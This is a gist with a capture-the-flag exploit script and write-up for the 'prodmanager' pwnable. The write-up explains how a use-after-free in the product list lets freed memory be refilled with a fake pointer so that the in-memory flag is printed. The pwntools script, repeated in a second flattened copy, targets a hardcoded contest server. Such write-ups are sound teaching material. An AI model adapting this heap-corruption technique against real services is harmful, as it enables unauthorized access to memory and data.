stephenR/doit.py

## doit.py
#!/usr/bin/env python

import pwn as p
import sys
import random

debug_enabled = len(sys.argv) > 1

def debug(s):
    if not debug_enabled:
        return
    print '[*] DEBUG: {}'.format(s)

def menu(choice):
    s.readuntil('(Not complete yet)\n')
    s.readuntil('Input: ')
    s.sendline(str(choice))

def create(name, price=1):
    debug('creating item "{}"'.format(name))
    menu(1)
    s.readuntil('Enter product name: ')
    s.sendline(name)
    s.readuntil('Enter product price: ')
    s.sendline(str(price))
    s.readuntil('Success!\n')

def add(name):
    debug('adding item "{}"'.format(name))
    menu(3)
    s.readuntil('Which product name would you like to add: ')
    s.sendline(name)
    #if 'INVALID' in s.readall():
    if "INVALID" in s.readuntil('successfully!\n'):
        print '---'*50
        print 'INPUT INVALID'
        exit(0)

def delete(name):
    debug('deleting item "{}"'.format(name))
    menu(2)
    s.readuntil('Which product name would you like to remove: ')
    s.sendline(name)
    s.readuntil('Remove successful!\n')

def set_profile(d):
    debug('setting profile')
    assert len(d) <= 74
    menu(5)
    s.readuntil('Creating profile!\n')
    s.sendline(d)
    s.readuntil('Profile created!\n')

def print3():
    menu(4)

flag = 0x0804c3e0

seed = random.randint(0, 0xffffffff)
seed = 1223085062
print 'seed: {}'.format(seed)
random.seed(seed)

def x():
    lenghts = [0x1000, 0x2000, 0x3000]
    random.shuffle(lenghts)
    create('1', lenghts[0])
    create('2', lenghts[1])
    create('3', lenghts[2])
    add('1')
    add('2')
    add('3')
    lenghts = [0x1fffffff, 0x2fffffff, 0x3fffffff]
    random.shuffle(lenghts)
    names = map(str, [1,2,3])
    random.shuffle(names)
    delete(names[0])
    set_profile(p.p32(lenghts[0]))
    delete(names[1])
    set_profile(p.p32(lenghts[1]))
    delete(names[2])
    set_profile(p.p32(lenghts[2])+p.p32(0)*4+p.p32(flag-0x18)+'Hi mom')
    #raw_input('gdb')
    print3()

#s = p.remote('127.0.0.1', 4667)
s = p.remote('52.5.68.190', 4667)
x()

s.clean_and_log()

## gistfile1.txt
prodmanager was a pwnable for 180 points implementing an enterprise ready product manager that keeps track of your inventory.
On startup the flag is read from a file and stored in memory somewhere.
The menu gave you 5 options:
1) create a new product
2) delete a product
3) add an item to the product manager
4) remove the 3 cheapest products and print their names and price
5) allocate 76 bytes for the uaf^w^wa profile name

Creating a product will ask you for a name and price and store it in a linked list.
The struct looks roughly like this:
struct product{
  int price;
  product *l_prev;
  product *l_next;
  product *parent;
  product *parent;
  product *parent;
  char name[];
};
l_prev and l_next are the linked list pointers. Deleting will remove it from the linked list and free the element.
Menu choice 5 will alloc exactly the size of the product and read arbitrary data into it, sounds legit.
3) and 4) insert and remove from the product manager which uses something that looks like a binary heap internally.
Creating a product, adding it to the manager and then deleting it again will result in a use after free, which we can conveniently control with menu choice 5.
All we have to do is add 3 items (the minimal amount so that we can call 4) and overwrite one of them with a pointer that will be interpreted as a new item with the flag as its name, so it should point to &flag - 0x18.
To do that we have to understand how reading from the heap works since blindly overwriting the product will result in a crash.
Ahh, screw that, 3 items, 3 pointers.. let's just fuzz that quickly:
* create 3 items and add them to the manager
* randomly choose one of them with and overwrite it with a random price, two null pointers and &flag-0x18 for the 3 heap pointers (in random order).
* goto 1
for the record, the random seed 1223085062 was the winner :)

by tsuro for Stratum^wEat sleep pwn repeat! (with help from saelo)
	#!/usr/bin/env python

	import pwn as p
	import sys
	import random

	debug_enabled = len(sys.argv) > 1

	def debug(s):
	if not debug_enabled:
	return
	print '[*] DEBUG: {}'.format(s)

	def menu(choice):
	s.readuntil('(Not complete yet)\n')
	s.readuntil('Input: ')
	s.sendline(str(choice))

	def create(name, price=1):
	debug('creating item "{}"'.format(name))
	menu(1)
	s.readuntil('Enter product name: ')
	s.sendline(name)
	s.readuntil('Enter product price: ')
	s.sendline(str(price))
	s.readuntil('Success!\n')

	def add(name):
	debug('adding item "{}"'.format(name))
	menu(3)
	s.readuntil('Which product name would you like to add: ')
	s.sendline(name)
	#if 'INVALID' in s.readall():
	if "INVALID" in s.readuntil('successfully!\n'):
	print '---'*50
	print 'INPUT INVALID'
	exit(0)

	def delete(name):
	debug('deleting item "{}"'.format(name))
	menu(2)
	s.readuntil('Which product name would you like to remove: ')
	s.sendline(name)
	s.readuntil('Remove successful!\n')

	def set_profile(d):
	debug('setting profile')
	assert len(d) <= 74
	menu(5)
	s.readuntil('Creating profile!\n')
	s.sendline(d)
	s.readuntil('Profile created!\n')

	def print3():
	menu(4)

	flag = 0x0804c3e0

	seed = random.randint(0, 0xffffffff)
	seed = 1223085062
	print 'seed: {}'.format(seed)
	random.seed(seed)

	def x():
	lenghts = [0x1000, 0x2000, 0x3000]
	random.shuffle(lenghts)
	create('1', lenghts[0])
	create('2', lenghts[1])
	create('3', lenghts[2])
	add('1')
	add('2')
	add('3')
	lenghts = [0x1fffffff, 0x2fffffff, 0x3fffffff]
	random.shuffle(lenghts)
	names = map(str, [1,2,3])
	random.shuffle(names)
	delete(names[0])
	set_profile(p.p32(lenghts[0]))
	delete(names[1])
	set_profile(p.p32(lenghts[1]))
	delete(names[2])
	set_profile(p.p32(lenghts[2])+p.p32(0)*4+p.p32(flag-0x18)+'Hi mom')
	#raw_input('gdb')
	print3()

	#s = p.remote('127.0.0.1', 4667)
	s = p.remote('52.5.68.190', 4667)
	x()

	s.clean_and_log()
	prodmanager was a pwnable for 180 points implementing an enterprise ready product manager that keeps track of your inventory.
	On startup the flag is read from a file and stored in memory somewhere.
	The menu gave you 5 options:
	1) create a new product
	2) delete a product
	3) add an item to the product manager
	4) remove the 3 cheapest products and print their names and price
	5) allocate 76 bytes for the uaf^w^wa profile name

	Creating a product will ask you for a name and price and store it in a linked list.
	The struct looks roughly like this:
	struct product{
	int price;
	product *l_prev;
	product *l_next;
	product *parent;
	product *parent;
	product *parent;
	char name[];
	};
	l_prev and l_next are the linked list pointers. Deleting will remove it from the linked list and free the element.
	Menu choice 5 will alloc exactly the size of the product and read arbitrary data into it, sounds legit.
	3) and 4) insert and remove from the product manager which uses something that looks like a binary heap internally.
	Creating a product, adding it to the manager and then deleting it again will result in a use after free, which we can conveniently control with menu choice 5.
	All we have to do is add 3 items (the minimal amount so that we can call 4) and overwrite one of them with a pointer that will be interpreted as a new item with the flag as its name, so it should point to &flag - 0x18.
	To do that we have to understand how reading from the heap works since blindly overwriting the product will result in a crash.
	Ahh, screw that, 3 items, 3 pointers.. let's just fuzz that quickly:
	* create 3 items and add them to the manager
	* randomly choose one of them with and overwrite it with a random price, two null pointers and &flag-0x18 for the 3 heap pointers (in random order).
	* goto 1
	for the record, the random seed 1223085062 was the winner :)

	by tsuro for Stratum^wEat sleep pwn repeat! (with help from saelo)